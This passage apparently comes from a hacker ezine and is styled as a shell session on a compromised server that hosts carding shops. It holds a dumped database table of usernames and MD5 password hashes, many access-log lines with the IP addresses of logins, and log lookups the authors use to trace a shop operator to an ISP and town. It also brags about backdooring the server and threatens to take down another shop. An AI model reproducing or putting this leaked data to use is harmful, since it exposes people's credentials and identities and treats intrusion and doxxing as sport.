| sysfuck | 95a3d9c2bce545f46bc54d8a750438b1 | | 17.5 | 0 | | +| 8879 | payment | ed8539ed5fe17d4dc3a18058831fb9bd | | 10 | 0 | | +| 8890 | PolskaDumny | c288a40b22e236022e43f96cf7bab952 | 165-034 | 8.5 | 0 | | +| 8933 | Dubstep | 3116ccacabe066ce091b171347fca80d | 427-073-373 | 25.2 | 0 | | +| 8960 | Hotter | 0981ee032a8e8af483dc24390916c737 | 282979840 | 7.5 | 0 | | +| 8969 | network44 | 44252cf93dd7a73ecc031f8363a26459 | 618445 | 10 | 0 | | +| 9010 | sey | f2f6ca16e070070fc5465ab4209586b5 | | 10 | 0 | | +| 9094 | MrPataa | 9c7b04e137048c6dc5bc2dae0f78bf68 | | 10 | 0 | | +| 9122 | Semtex99 | 9ca40c627bb00f08347cf336fb09011b | | 9 | 0 | | +| 9183 | trainee | a2147086850706ecb2b6f2919fed8e40 | 350610 | 7 | 0 | | +| 9216 | opfa | 01fc7192adba9cbba78b612ebeca6b66 | | 11 | 0 | | +| 9223 | ivory | 00b86e77b9f76fc1f466555b6af345f8 | | 10 | 0 | | +| 9253 | blur121 | 7e4ea1bf5ca4e36d14e6296e485970f2 | | 10 | 0 | | +| 9590 | kani2012 | ec11aacc5832b63f02f1269e89d3cdd7 | 858223 | 7 
| 0 | | +| 9269 | drm1hy | c6cb19878e6a335d4fabb115ca8e3605 | | 24 | 0 | | +| 9273 | TrOvEjAr | 9378884c5f76bf23f5aaedd1035017ba | 234307423 | 20 | 0 | | +| 9275 | gist505 | fcdd4eae6aff919545ff68b6e3943b91 | | 8.98 | 0 | | +| 9298 | mrgreen | 824a67f29e97b8798a9df7f00189f3e1 | | 35 | 0 | | +| 9307 | GStar | 2472ee727ed8de9a818fc657a6895646 | | 10 | 0 | | +| 9310 | Domi93 | b36d331451a61eb2d76860e00c347396 | | 8 | 0 | | +| 9348 | pwned | 530ea1472e71035353d32d341ecf6343 | | 6.5 | 0 | | +| 9357 | darkt0wn | a56b6119d6c8be8e2d0d25bcfdca25c6 | | 10 | 0 | | +| 9375 | optik | d6ae345d39ca27dcc9c8e9c30a814041 | | 7 | 0 | | +| 9397 | U3 | 93327f2856df1105a1318895ac44e684 | 645458882 | 20.2 | 0 | | +| 9410 | mule22 | d27c8e6c3222ea5da09eb7f0f9d56818 | | 7 | 0 | | +| 9448 | BL4cKKS | cdbec512b7a848722346013aa3e44f8b | | 7 | 0 | | +| 9508 | PEPPEP | 6ec176f463121c7a1fc2f442ba22e937 | | 6 | 0 | | +| 9534 | Cardercc | 461ae6b500f5802d4d52b34643cdcc6e | | 11 | 0 | | +| 9599 | nolandro | 78f5cf8d0ee4f6b1e612a36954c1254d | | 50 | 0 | | +| 9600 | KoKaiiiN | dc74e595f9938b1ea1f1a078ae154949 | 363727670 | 6 | 0 | | +| 9618 | D3DMan | e78e0c9c18a6490ef56c3ffe837e0fca | | 10.5 | 0 | | +| 9621 | Abdulleben | 25d55ad283aa400af464c76d713c07ad | | 6.5 | 0 | | +| 9631 | sexonthebeach | 2dfbaaecbe98198ace8c554cc426b6d4 | | 44 | 0 | | +| 9701 | heiko4321 | 12a6265a271b7b23e943f5986d80d190 | | 7.5 | 0 | | +| 9726 | albozz | d41d8cd98f00b204e9800998ecf8427e | | 18 | 0 | | +| 9729 | Spexti | 4dfd9542414fed623b432aee923618d0 | | 6 | 0 | | +| 9791 | Bastler | a278ec2edc9105bd52fe62254522ecd4 | | 20 | 0 | | +| 9820 | vima | f3674879f5e18c7989e02235da302cc9 | | 20 | 0 | | +| 9822 | xNiightx | ef605602b07ae6b27054649d92e28b3e | 474300093 | 19 | 0 | | +| 9824 | bergwerk | c4fd4f3a6e0f9ccbc309a510a7efbad4 | | 12 | 0 | | +| 9948 | funny333 | 56a876cce8c5d91ed47db1b742573d36 | | 17.5 | 0 | | +| 9966 | Friedrich | 28acec923aa820ebbe028955a5a46356 | ja | 7 | 0 | | +| 10035 | Auzodiox | 
286119328282d5d64cf1a3a02aba6316 | | 15 | 0 | | +| 10003 | donjuan | 6d11921056f42e148b13a528c82d174e | | 5.5 | 0 | | +| 10005 | hajo22 | 566a1fc42bc3fa17a3920221d2b24d34 | | 6 | 0 | | +| 10032 | golem | 62650cd9a5fb136dc137b155e4ae6f2a | | 15.5 | 0 | | +| 10033 | blood | 42ee64c24d1efcc4c1916074461854f3 | | 10 | 0 | | +| 10051 | Technoboom | 77711870d494d022654bcf842b603467 | | 7 | 0 | | +| 10217 | LiBeRtY1338 | d41d8cd98f00b204e9800998ecf8427e | 634365955 | 9.1 | 0 | | +| 10085 | mo100 | 7cc5a8be611ccce374885048bc2a4848 | | 32.5 | 0 | | +| 10575 | Twix2010 | 75a593a34aa5ba8e5e5788b7c899802e | | 7 | 0 | | +| 10216 | Spagel | 22243bfba05b9715e6303dacf7f66c90 | | 30 | 0 | | +| 10391 | DerHase | e99a18c428cb38d5f260853678922e03 | | 7.5 | 0 | | +| 10290 | samsamsam3 | 03f828f4b26b4ebab502c56a78cc0580 | 600148357 | 70 | 0 | | +| 10304 | dasfrek | de68fbe75420c572d172d456ec9a48b3 | 158204790 | 13 | 0 | | +| 10402 | Kevko | a0017f523db6e51a75f02647a89280bd | 480179 | 9 | 0 | | +| 10440 | ahm123 | 97c45c9bb4cea4d08721d101388578bb | | 7 | 0 | | +| 10555 | homer | f54146a3fc82ab17e5265695b23f646b | | 9 | 0 | | +| 10557 | ccmajor | 1fafd7a63f5980302a5cdaa790988b7b | 158545 | 10 | 0 | | ++--------+---------------+----------------------------------+--------------+---------+--------+---+ +169 rows in set (0.01 sec) + +mysql> Aborted + +# cd /var/log/httpd + +# Some recent ip adresses?^C + +# grep "st0re.cc.*POST.*login_do.php" httpd_20110930_* httpd_access.log +httpd_20110930_a.log:st0re.cc 91.23.167.77 2 30.09.11 03:30:01 "POST /login_do.php HTTP/1.0" 47627 637 341 +httpd_20110930_a.log:st0re.cc 87.168.17.156 2 30.09.11 04:13:28 "POST /login_do.php HTTP/1.0" 8509 726 323 +httpd_20110930_a.log:st0re.cc 178.162.135.234 2 30.09.11 04:52:16 "POST /login_do.php HTTP/1.0" 8323 705 323 +httpd_20110930_a.log:st0re.cc 80.142.47.156 2 30.09.11 05:06:21 "POST /login_do.php HTTP/1.0" 8148 634 323 +httpd_20110930_a.log:st0re.cc 212.150.184.230 2 30.09.11 08:19:53 "POST /login_do.php 
HTTP/1.0" 8213 652 323 +httpd_20110930_a.log:st0re.cc 2.200.120.131 2 30.09.11 09:56:50 "POST /login_do.php HTTP/1.0" 8549 669 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 10:47:44 "POST /login_do.php HTTP/1.0" 8941 583 323 +httpd_20110930_a.log:st0re.cc 95.211.13.145 2 30.09.11 10:50:13 "POST /login_do.php HTTP/1.0" 8095 635 323 +httpd_20110930_a.log:st0re.cc 80.226.24.8 2 30.09.11 11:18:30 "POST /login_do.php HTTP/1.0" 8314 670 323 +httpd_20110930_a.log:st0re.cc 79.253.2.25 2 30.09.11 11:27:54 "POST /login_do.php HTTP/1.0" 8574 720 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 11:32:49 "POST /login_do.php HTTP/1.0" 8150 583 323 +httpd_20110930_a.log:st0re.cc 77.176.68.228 2 30.09.11 13:01:42 "POST /login_do.php HTTP/1.0" 8211 641 3411 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 13:19:38 "POST /login_do.php HTTP/1.0" 8286 583 323 +httpd_20110930_a.log:st0re.cc 188.136.8.225 2 30.09.11 13:56:34 "POST /login_do.php HTTP/1.0" 8711 642 323 +httpd_20110930_a.log:st0re.cc 92.241.168.24 2 30.09.11 14:31:08 "POST /login_do.php HTTP/1.0" 8377 630 323 +httpd_20110930_a.log:st0re.cc 84.140.101.35 2 30.09.11 14:51:37 "POST /login_do.php HTTP/1.0" 8876 723 323 +httpd_20110930_a.log:st0re.cc 93.192.34.166 2 30.09.11 15:34:17 "POST /login_do.php HTTP/1.0" 9479 788 341 +httpd_20110930_a.log:st0re.cc 92.201.119.237 2 30.09.11 15:45:12 "POST /login_do.php HTTP/1.0" 8372 641 323 +httpd_20110930_a.log:st0re.cc 87.122.41.84 2 30.09.11 15:57:19 "POST /login_do.php HTTP/1.0" 8163 633 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 16:04:08 "POST /login_do.php HTTP/1.0" 8246 583 323 +httpd_20110930_a.log:st0re.cc 88.72.19.192 2 30.09.11 16:15:47 "POST /login_do.php HTTP/1.0" 8768 630 323 +httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 16:22:46 "POST /login_do.php HTTP/1.0" 8777 705 341 +httpd_20110930_a.log:st0re.cc 77.10.175.234 2 30.09.11 16:24:21 "POST /login_do.php HTTP/1.0" 272729 732 323 +httpd_20110930_a.log:st0re.cc 
94.220.183.63 2 30.09.11 16:26:26 "POST /login_do.php HTTP/1.0" 8575 723 323 +httpd_20110930_a.log:st0re.cc 93.192.34.166 2 30.09.11 16:30:04 "POST /login_do.php HTTP/1.0" 8150 787 323 +httpd_20110930_a.log:st0re.cc 178.202.68.98 2 30.09.11 16:30:24 "POST /login_do.php HTTP/1.0" 8242 636 323 +httpd_20110930_a.log:st0re.cc 178.7.135.0 2 30.09.11 16:33:20 "POST /login_do.php HTTP/1.0" 8378 648 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 16:43:58 "POST /login_do.php HTTP/1.0" 8185 583 323 +httpd_20110930_a.log:st0re.cc 92.241.164.197 2 30.09.11 16:44:05 "POST /login_do.php HTTP/1.0" 8263 654 323 +httpd_20110930_a.log:st0re.cc 77.10.175.234 2 30.09.11 16:48:12 "POST /login_do.php HTTP/1.0" 8888 761 323 +httpd_20110930_a.log:st0re.cc 46.115.16.29 2 30.09.11 16:55:14 "POST /login_do.php HTTP/1.0" 8958 718 323 +httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 16:55:44 "POST /login_do.php HTTP/1.0" 8141 723 323 +httpd_20110930_a.log:st0re.cc 88.76.37.149 2 30.09.11 16:59:33 "POST /login_do.php HTTP/1.0" 8468 643 323 +httpd_20110930_a.log:st0re.cc 77.186.7.122 2 30.09.11 17:05:15 "POST /login_do.php HTTP/1.0" 8506 632 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:05:35 "POST /login_do.php HTTP/1.0" 8739 583 323 +httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 17:06:11 "POST /login_do.php HTTP/1.0" 8214 732 323 +httpd_20110930_a.log:st0re.cc 91.53.197.228 2 30.09.11 17:07:00 "POST /login_do.php HTTP/1.0" 8094 787 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:09:32 "POST /login_do.php HTTP/1.0" 8230 583 323 +httpd_20110930_a.log:st0re.cc 178.3.99.162 2 30.09.11 17:12:29 "POST /login_do.php HTTP/1.0" 8606 640 323 +httpd_20110930_a.log:st0re.cc 87.122.41.84 2 30.09.11 17:15:16 "POST /login_do.php HTTP/1.0" 8181 633 323 +httpd_20110930_a.log:st0re.cc 84.177.153.224 2 30.09.11 17:17:27 "POST /login_do.php HTTP/1.0" 8550 650 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:23:17 "POST /login_do.php 
HTTP/1.0" 8164 583 323 +httpd_20110930_a.log:st0re.cc 92.224.62.134 2 30.09.11 17:25:51 "POST /login_do.php HTTP/1.0" 8164 642 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:50:25 "POST /login_do.php HTTP/1.0" 8288 583 323 +httpd_20110930_a.log:st0re.cc 178.162.135.66 2 30.09.11 17:56:45 "POST /login_do.php HTTP/1.0" 8871 612 323 +httpd_20110930_a.log:st0re.cc 77.8.111.185 2 30.09.11 18:00:22 "POST /login_do.php HTTP/1.0" 8204 635 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 18:06:05 "POST /login_do.php HTTP/1.0" 8037 583 323 +httpd_20110930_a.log:st0re.cc 178.86.4.72 2 30.09.11 18:09:59 "POST /login_do.php HTTP/1.0" 8348 640 323 +httpd_20110930_a.log:st0re.cc 87.156.226.177 2 30.09.11 18:15:41 "POST /login_do.php HTTP/1.0" 8184 650 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 18:32:35 "POST /login_do.php HTTP/1.0" 13208 583 323 +httpd_20110930_a.log:st0re.cc 62.177.139.171 2 30.09.11 18:43:36 "POST /login_do.php HTTP/1.0" 8538 612 323 +httpd_20110930_a.log:st0re.cc 188.99.237.187 2 30.09.11 18:44:23 "POST /login_do.php HTTP/1.0" 8195 631 323 +httpd_20110930_a.log:st0re.cc 84.144.24.26 2 30.09.11 18:46:44 "POST /login_do.php HTTP/1.0" 8378 733 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 18:58:16 "POST /login_do.php HTTP/1.0" 8107 583 323 +httpd_20110930_a.log:st0re.cc 88.128.93.67 2 30.09.11 19:14:31 "POST /login_do.php HTTP/1.0" 8347 741 323 +httpd_20110930_a.log:st0re.cc 84.159.35.59 2 30.09.11 19:28:20 "POST /login_do.php HTTP/1.0" 8304 644 323 +httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 19:35:08 "POST /login_do.php HTTP/1.0" 8222 732 323 +httpd_20110930_a.log:st0re.cc 95.118.133.136 2 30.09.11 19:43:28 "POST /login_do.php HTTP/1.0" 8076 641 323 +httpd_20110930_a.log:st0re.cc 77.183.29.40 2 30.09.11 19:45:35 "POST /login_do.php HTTP/1.0" 8195 639 323 +httpd_20110930_a.log:st0re.cc 213.135.18.45 2 30.09.11 19:49:23 "POST /login_do.php HTTP/1.0" 8152 581 323 
+httpd_20110930_a.log:st0re.cc 87.156.29.114 2 30.09.11 19:52:03 "POST /login_do.php HTTP/1.0" 8481 723 323 +httpd_20110930_a.log:st0re.cc 217.231.145.151 2 30.09.11 20:08:21 "POST /login_do.php HTTP/1.0" 8568 794 341 +httpd_20110930_a.log:st0re.cc 217.231.145.151 2 30.09.11 20:08:34 "POST /login_do.php HTTP/1.0" 9612 793 323 +httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 20:10:43 "POST /login_do.php HTTP/1.0" 8277 723 323 +httpd_20110930_a.log:st0re.cc 213.135.18.45 2 30.09.11 20:14:09 "POST /login_do.php HTTP/1.0" 8427 581 323 +httpd_20110930_a.log:st0re.cc 92.225.99.187 2 30.09.11 20:15:41 "POST /login_do.php HTTP/1.0" 8416 625 341 +httpd_20110930_a.log:st0re.cc 92.225.99.187 2 30.09.11 20:16:47 "POST /login_do.php HTTP/1.0" 8292 641 323 +httpd_20110930_a.log:st0re.cc 213.163.65.50 2 30.09.11 20:19:02 "POST /login_do.php HTTP/1.0" 8270 629 323 +httpd_20110930_a.log:st0re.cc 84.166.216.59 2 30.09.11 20:36:40 "POST /login_do.php HTTP/1.0" 8410 721 323 +httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 20:51:21 "POST /login_do.php HTTP/1.0" 8349 732 323 +httpd_20110930_a.log:st0re.cc 213.135.18.45 2 30.09.11 20:54:58 "POST /login_do.php HTTP/1.0" 8343 581 323 +httpd_20110930_a.log:st0re.cc 95.118.133.136 2 30.09.11 20:56:17 "POST /login_do.php HTTP/1.0" 8158 641 323 +httpd_20110930_a.log:st0re.cc 95.118.133.136 2 30.09.11 21:14:05 "POST /login_do.php HTTP/1.0" 8708 641 323 +httpd_20110930_a.log:st0re.cc 84.189.234.204 2 30.09.11 21:17:37 "POST /login_do.php HTTP/1.0" 8194 671 323 +httpd_20110930_a.log:st0re.cc 87.139.98.60 2 30.09.11 21:23:18 "POST /login_do.php HTTP/1.0" 8082 644 323 +httpd_20110930_a.log:st0re.cc 109.236.86.130 2 30.09.11 21:35:53 "POST /login_do.php HTTP/1.0" 8154 645 323 +httpd_20110930_a.log:st0re.cc 93.186.200.12 2 30.09.11 21:45:37 "POST /login_do.php HTTP/1.0" 8409 627 341 +httpd_20110930_a.log:st0re.cc 77.183.29.40 2 30.09.11 21:46:22 "POST /login_do.php HTTP/1.0" 8157 639 323 +httpd_20110930_a.log:st0re.cc 62.141.36.190 2 
30.09.11 21:50:30 "POST /login_do.php HTTP/1.0" 8119 622 341 +httpd_20110930_a.log:st0re.cc 62.141.36.190 2 30.09.11 21:50:37 "POST /login_do.php HTTP/1.0" 8241 622 323 +httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 21:53:11 "POST /login_do.php HTTP/1.0" 8070 723 323 +httpd_20110930_a.log:st0re.cc 178.202.68.98 2 30.09.11 21:53:33 "POST /login_do.php HTTP/1.0" 8254 636 323 +httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 22:07:29 "POST /login_do.php HTTP/1.0" 8648 732 323 +httpd_20110930_a.log:st0re.cc 89.15.88.227 2 30.09.11 22:19:27 "POST /login_do.php HTTP/1.0" 8205 635 341 +httpd_20110930_a.log:st0re.cc 80.239.242.78 2 30.09.11 22:21:00 "POST /login_do.php HTTP/1.0" 8402 646 323 +httpd_20110930_a.log:st0re.cc 91.10.251.46 2 30.09.11 22:31:06 "POST /login_do.php HTTP/1.0" 8479 721 341 +httpd_20110930_a.log:st0re.cc 91.10.251.46 2 30.09.11 22:33:29 "POST /login_do.php HTTP/1.0" 8240 720 323 +httpd_20110930_a.log:st0re.cc 178.202.68.98 2 30.09.11 22:33:49 "POST /login_do.php HTTP/1.0" 14741 636 323 +httpd_20110930_a.log:st0re.cc 77.24.94.72 2 30.09.11 22:34:14 "POST /login_do.php HTTP/1.0" 8203 663 341 +httpd_20110930_a.log:st0re.cc 82.195.234.50 2 30.09.11 22:36:30 "POST /login_do.php HTTP/1.0" 8304 729 341 +httpd_20110930_a.log:st0re.cc 82.195.234.50 2 30.09.11 22:36:38 "POST /login_do.php HTTP/1.0" 8228 730 323 +httpd_20110930_a.log:st0re.cc 178.3.99.162 2 30.09.11 22:42:38 "POST /login_do.php HTTP/1.0" 8094 640 323 +httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 23:08:46 "POST /login_do.php HTTP/1.0" 8207 732 323 +httpd_20110930_a.log:st0re.cc 89.204.153.246 2 30.09.11 23:10:14 "POST /login_do.php HTTP/1.0" 8285 696 323 +httpd_20110930_a.log:st0re.cc 79.192.107.57 2 30.09.11 23:20:54 "POST /login_do.php HTTP/1.0" 8307 639 323 +httpd_20110930_a.log:st0re.cc 93.196.21.139 2 30.09.11 23:29:34 "POST /login_do.php HTTP/1.0" 8856 633 323 +httpd_20110930_a.log:st0re.cc 2.213.95.13 2 30.09.11 23:50:22 "POST /login_do.php HTTP/1.0" 8379 633 
323 +httpd_20110930_a.log:st0re.cc 82.83.112.126 2 30.09.11 23:56:18 "POST /login_do.php HTTP/1.0" 8721 744 323 +httpd_20110930_a.log:st0re.cc 77.20.159.112 2 01.10.11 00:20:55 "POST /login_do.php HTTP/1.0" 8354 643 323 +httpd_20110930_a.log:st0re.cc 178.9.168.231 2 01.10.11 01:13:45 "POST /login_do.php HTTP/1.0" 9722 729 341 +httpd_20110930_a.log:st0re.cc 84.59.159.134 2 01.10.11 01:35:23 "POST /login_do.php HTTP/1.0" 8207 646 323 +httpd_20110930_a.log:st0re.cc 87.139.98.60 2 01.10.11 01:48:07 "POST /login_do.php HTTP/1.0" 9020 644 323 +httpd_20110930_a.log:st0re.cc 92.224.0.114 2 01.10.11 01:56:01 "POST /login_do.php HTTP/1.0" 8930 640 341 +httpd_20110930_a.log:st0re.cc 92.224.0.114 2 01.10.11 01:58:53 "POST /login_do.php HTTP/1.0" 8227 648 341 +httpd_20110930_a.log:st0re.cc 195.71.18.209 2 01.10.11 02:40:09 "POST /login_do.php HTTP/1.0" 8594 630 323 +httpd_20110930_a.log:st0re.cc 95.118.98.231 2 01.10.11 02:47:35 "POST /login_do.php HTTP/1.0" 8143 735 341 +httpd_20110930_a.log:st0re.cc 95.222.50.203 2 01.10.11 03:00:42 "POST /login_do.php HTTP/1.0" 8455 637 323 +httpd_access.log:st0re.cc 79.247.250.2 2 01.10.11 03:25:18 "POST /login_do.php HTTP/1.0" 8322 648 341 +httpd_access.log:st0re.cc 79.247.250.2 2 01.10.11 03:25:30 "POST /login_do.php HTTP/1.0" 1543 648 341 +httpd_access.log:st0re.cc 84.189.234.204 2 01.10.11 03:56:19 "POST /login_do.php HTTP/1.0" 8108 671 323 +httpd_access.log:st0re.cc 46.115.17.43 2 01.10.11 04:19:31 "POST /login_do.php HTTP/1.0" 8725 629 341 +httpd_access.log:st0re.cc 46.115.17.43 2 01.10.11 04:19:57 "POST /login_do.php HTTP/1.0" 8745 627 323 +httpd_access.log:st0re.cc 84.74.179.83 2 01.10.11 05:17:41 "POST /login_do.php HTTP/1.0" 8227 724 323 +httpd_access.log:st0re.cc 66.176.9.110 2 01.10.11 06:22:46 "POST /login_do.php HTTP/1.0" 8182 889 323 +httpd_access.log:st0re.cc 84.171.65.229 2 01.10.11 11:16:40 "POST /login_do.php HTTP/1.0" 10603 646 323 +httpd_access.log:st0re.cc 213.135.18.45 2 01.10.11 11:32:59 "POST /login_do.php HTTP/1.0" 
8670 581 323 +httpd_access.log:st0re.cc 92.224.58.242 2 01.10.11 11:59:27 "POST /login_do.php HTTP/1.0" 8330 633 323 +httpd_access.log:st0re.cc 115.184.3.252 2 01.10.11 12:12:22 "POST /login_do.php HTTP/1.0" 8176 699 323 +httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 12:41:47 "POST /login_do.php HTTP/1.0" 8422 787 323 +httpd_access.log:st0re.cc 89.0.20.128 2 01.10.11 13:00:16 "POST /login_do.php HTTP/1.0" 8213 647 323 +httpd_access.log:st0re.cc 85.17.97.27 2 01.10.11 13:31:59 "POST /login_do.php HTTP/1.0" 8667 634 341 +httpd_access.log:st0re.cc 212.150.184.230 2 01.10.11 13:37:20 "POST /login_do.php HTTP/1.0" 8082 652 323 +httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 13:48:36 "POST /login_do.php HTTP/1.0" 8041 787 323 +httpd_access.log:st0re.cc 80.142.41.35 2 01.10.11 13:56:41 "POST /login_do.php HTTP/1.0" 8142 675 323 +httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 13:58:43 "POST /login_do.php HTTP/1.0" 1754 787 323 +httpd_access.log:st0re.cc 92.226.41.234 2 01.10.11 14:09:46 "POST /login_do.php HTTP/1.0" 8161 636 341 +httpd_access.log:st0re.cc 178.202.68.98 2 01.10.11 14:09:49 "POST /login_do.php HTTP/1.0" 8236 636 323 +httpd_access.log:st0re.cc 92.226.41.234 2 01.10.11 14:09:52 "POST /login_do.php HTTP/1.0" 8429 644 323 +httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 14:30:23 "POST /login_do.php HTTP/1.0" 8060 794 341 +httpd_access.log:st0re.cc 87.122.41.84 2 01.10.11 14:42:56 "POST /login_do.php HTTP/1.0" 8176 633 323 +httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 14:45:00 "POST /login_do.php HTTP/1.0" 1750 787 323 +httpd_access.log:st0re.cc 92.224.11.28 2 01.10.11 15:03:01 "POST /login_do.php HTTP/1.0" 8030 664 341 +httpd_access.log:st0re.cc 88.74.202.98 2 01.10.11 15:45:47 "POST /login_do.php HTTP/1.0" 8167 661 323 +httpd_access.log:st0re.cc 95.118.133.136 2 01.10.11 15:50:25 "POST /login_do.php HTTP/1.0" 8025 641 323 +httpd_access.log:st0re.cc 217.79.178.233 2 01.10.11 15:52:07 "POST /login_do.php HTTP/1.0" 8115 726 323 
+httpd_access.log:st0re.cc 77.188.205.152 2 01.10.11 15:56:27 "POST /login_do.php HTTP/1.0" 8137 643 323 +httpd_access.log:st0re.cc 87.122.34.237 2 01.10.11 15:58:01 "POST /login_do.php HTTP/1.0" 8125 635 323 +httpd_access.log:st0re.cc 212.117.165.197 2 01.10.11 16:25:15 "POST /login_do.php HTTP/1.0" 8005 646 323 +httpd_access.log:st0re.cc 46.20.44.58 2 01.10.11 16:26:19 "POST /login_do.php HTTP/1.0" 7911 638 341 +httpd_access.log:st0re.cc 93.223.63.24 2 01.10.11 16:39:27 "POST /login_do.php HTTP/1.0" 8066 631 323 +httpd_access.log:st0re.cc 77.20.159.112 2 01.10.11 16:47:10 "POST /login_do.php HTTP/1.0" 8025 643 323 +httpd_access.log:st0re.cc 109.236.86.130 2 01.10.11 16:59:19 "POST /login_do.php HTTP/1.0" 1524 719 323 +httpd_access.log:st0re.cc 88.69.129.69 2 01.10.11 17:01:04 "POST /login_do.php HTTP/1.0" 8045 721 323 +httpd_access.log:st0re.cc 62.141.46.134 2 01.10.11 17:06:19 "POST /login_do.php HTTP/1.0" 8112 645 323 +httpd_access.log:st0re.cc 93.133.47.182 2 01.10.11 17:14:46 "POST /login_do.php HTTP/1.0" 8307 622 341 + +# And who is the guy behind that crap?^C + +# last | grep mmgen +mmgen ftp 212.150.184.230 Mon Oct 3 16:58 - 16:59 (00:01) +mmgen ftp 212.150.184.230 Mon Oct 3 16:57 - 16:58 (00:01) +mmgen ftp 212.150.184.230 Mon Oct 3 16:43 - 16:44 (00:01) +mmgen ftp 212.150.184.230 Mon Oct 3 16:10 - 16:11 (00:01) +mmgen ftp 212.150.184.230 Mon Oct 3 16:10 - 16:13 (00:03) +mmgen ftp 212.150.184.230 Mon Oct 3 16:04 - 16:05 (00:01) +mmgen ftp 212.150.184.230 Mon Oct 3 15:54 - 16:00 (00:05) +mmgen ftp 212.150.184.230 Mon Oct 3 15:54 - 15:54 (00:00) +mmgen ftp 212.150.184.230 Mon Oct 3 15:54 - 15:57 (00:03) + +# Israel does not look that interesting...^C + +# grep mgen.*78 /var/log/proftpd-transfer.log +Sun Dec 19 14:56:29 2010 0 92.241.164.197 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180253783625111 b _ d r mmgen ftp 0 * c +Fri Jan 14 23:16:40 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180257808454951 a _ d r mmgen 
ftp 0 * c +Sun Jan 23 16:36:30 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180256065317802 a _ d r mmgen ftp 0 * c +Thu Jan 27 23:14:04 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250537839337 a _ o r mmgen ftp 0 * c +Thu Jan 27 23:14:07 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250621167843 a _ o r mmgen ftp 0 * c +Thu Jan 27 23:17:39 2011 0 78.42.186.98 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250537839337 a _ d r mmgen ftp 0 * c +Thu Jan 27 23:17:39 2011 0 78.42.186.98 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250621167843 a _ d r mmgen ftp 0 * c + +78.42.186.98 resolves to Kabel Baden-Wuerttemberg GmbH & Co. KG, +Muellheim in Germany. Looks like someone did not constantly use a +proxy. Means you are officially + . + / \ + | | + |.| PWNED LOL! + |.| / + |:| __ / +,_|:|_, / ) + (Oo / _I_ + +\ \ || __| + \ \||___| + \ /.:.\-\ + |.:. /-----\ + |___|::pwn::| + / |:<_T_>:| + |_____\ ::: / + | | \ \:/ + | | | | + \ / | \___ + / | \_____\ + +Alright people let's keep the show going with El-Basar.biz ... + + ,;~;, + /\_ + ( / + (() //) + | \\ ,,;;'\ + __ _( )m=((((((((((((((========{ El-Basar.biz }=======------- + /' ' '()/~' '.(, | + ,;( )|| | ~ Searching for "El-Bazar.biz" on google gives a +,;' \ /-(.;, ) good impression of what's being sold there. You + ) / ) / can buy one week of DDOS to take down one web- + // || site for 250 Euros. You get 10 US CCs without + )_\ )_\ DOB (date of birth) for 5 Euros. And you can even +buy 50g of MDMA crystals for 2000 Euros. Hilarious! El-Basar is being +run by some guy called Ganymedes and was hosted on the same server as +St0re.cc. However it seems like Ganymedes has moved his shop to +another location which sadly has not been backdoored by us so far and +thus will not make it into this issue of our ezine. 
Notwithstanding he +left enough data on his old box, but we must say, Ganymedes, if you +don't take down your store, we will be so kind and do that for you +sooner or later. Thanks. + +# pwd +/home + +# ls -la +total 116 +drwx--x--x 28 root wheel 1024 Sep 14 17:31 . +drwx--x--x 18 root wheel 512 Apr 12 19:59 .. +drwxrwx--- 13 alg www 1024 Feb 19 2011 alg +drwxr-x--- 4 ayoga www 512 Apr 23 2009 ayoga +drwxr-x--- 5 crank2010 www 512 Dec 27 2009 crank2010 +drwxr-x--- 4 exchanger www 512 Mar 31 2010 exchanger +drwxr-x--- 6 filip www 512 Jul 16 2010 filip +drwxr-x--- 5 ganymedes www 512 Oct 5 21:43 ganymedes +drwxr-x--- 6 garf www 512 Apr 16 02:26 garf +drwxr-x--- 4 lordknight www 512 Jan 3 2010 lordknight +drwxr-x--- 4 madrage www 512 Jan 10 2010 madrage +drwxrwxr-x 5 margosha www 512 Sep 8 16:22 margosha +drwxr-x--- 7 mmgen www 512 Jun 11 13:18 mmgen +drwxr-x--- 9 mr101 www 512 Apr 7 2010 mr101 +drwxr-x--- 4 msk www 512 May 20 2009 msk +drwxr-x--- 4 muraaat www 512 Aug 29 20:59 muraaat +drwxr-x--- 7 nukeuploads www 512 Dec 2 2009 nukeuploads +drwxr-x--- 8 onlineschauen www 512 Oct 1 23:57 onlineschauen +drwxr-x--- 4 pavlrse www 512 Aug 21 03:32 pavlrse +drwxr-x--- 8 propiska www 512 Nov 